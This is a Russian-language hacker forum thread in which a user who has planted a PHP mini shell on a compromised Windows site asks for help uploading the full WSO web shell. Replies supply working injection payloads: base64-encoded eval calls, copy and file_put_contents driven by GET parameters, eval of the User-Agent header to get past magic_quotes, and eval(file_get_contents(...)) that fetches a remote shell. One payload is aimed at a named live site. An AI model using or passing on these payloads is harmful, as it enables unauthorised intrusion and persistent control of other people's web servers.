![]() |
Доброго времени суток.
Залился на сайт. Через время допустил ошибку и шелл снесли. Оставил на сайте мини шелл. Захожу, все работает, довольный сижу такой, думаю щас зальюсь. А тут ***.... mshell.php?p1r0=phpinfo(); - GOOD mshell.php?p1r0=copy('http://site./wso.txt','./wso.php'); - BAD На сервере винда.... От чего может такое быть? Как решать? Спасибо. |
http://base64.ru/
Кодируешь PHP код, затем юзаешь так: mshell.php?p1r0=eval(base64_decode()); без '', и если спец символы на хвосте ("равно" например), то просто убирай их. Думаю, должно сработать... |
Не помогло, но спасибо.
|
ShellRoot
base64_decode тоже принимает стринг, поэтому кaвычки обязательны 2 TC copy($_GET[a],$_GET);&a=...&b= или file_put_contents($_GET[a],file_get_contents($_GET));&a=&b= пригодится http://php.su/functions/?stripslashes |
Konqi, сколько раз без кавычек делал норм, достаточно стринг сделать так:
$a = (textstring); но вот если используются спец.символы, такие как точки и т.п тогда уже надо, но мы специально заюзали без "равно", или иначе заюзать из глобальной переменной |
Цитата:
Хочешь грамотный ответ - давай инфу по ключевым позициям. Из того же phpinfo. Что такое "там" ключевые позиции - думай сам. PS: Прежде чем страдать херней и юзать всяческие аплоадеры - для начала найди папку, в которую ты можешь вообще писать в принципе, и проверить её еще на предмет запретных правил предварительно (ошибки вообще-то тоже фиксируются). На то у тебя уже есть огромные возможности - выполняется phpinfo() - Значит в твоем распоряжении вся мощь языка ПИЭЙЧПИ. Кстати, стыдно задавать такие вопросы, если phpinfo() выполняется. И никакие статьи это не реабилитируют. У тебя уже есть выполнение php-кода. Вообще-то это равно иметь шелл. Думай |
Pashkela, стыдно задавать такие вопросы, но если их не задавать, то стыдится прийдется всегда!
Спасибо, вот щас сижу, думаю. Цитата:
UPD ________________________________________ Пробовал осздать файл, не помогло, не создается.... Идеи? |
Цитата:
Далее по делу: http://site/?cmd=eval($_SERVER[HTTP_USER_AGENT]); И модифицируй к виду HEADER: HTTP_USER_AGENT-> file_put_content('uploader.php','upload php code'); Это если php5 - если 4 пофантазируй. В пути также на директорию должны быть права. Я не знаю какие у тебя ограничения в твоем случае. Мб поможет, в данном случае использование не GPC массива снимет слеширование через magic_quotes и прозволит использовать кавычки и указывать пути. |
http://www.datingfast.com/wp-atom.php?p1r0=eval(file_get_contents(base64_decode (тут_без_кавычек_адрес_твое о_шелла_например_http://site/shell.txt_только_в_base64)));
т.е. что-то типо этого: http://www.datingfast.com/wp-atom.php?p1r0=eval(file_get_contents(base64_decode (aHR0cDovL3NpdGUvd3NvMl9ldmFsLnR4dA))); НО, сначала почитай: /thread191917.html посмотри на дату и пусть тебе станет стыдно PS: пох на права, шелл там льется за 2 секунды Не проверял, но по моему легко зальется wso pack shell - т.е. упакованный (размер имеет значение ) |
Никак не выходит... И не у меня одного, ещё пару человек пробовало. Далеко не новечки...
|
| Время: 16:31 |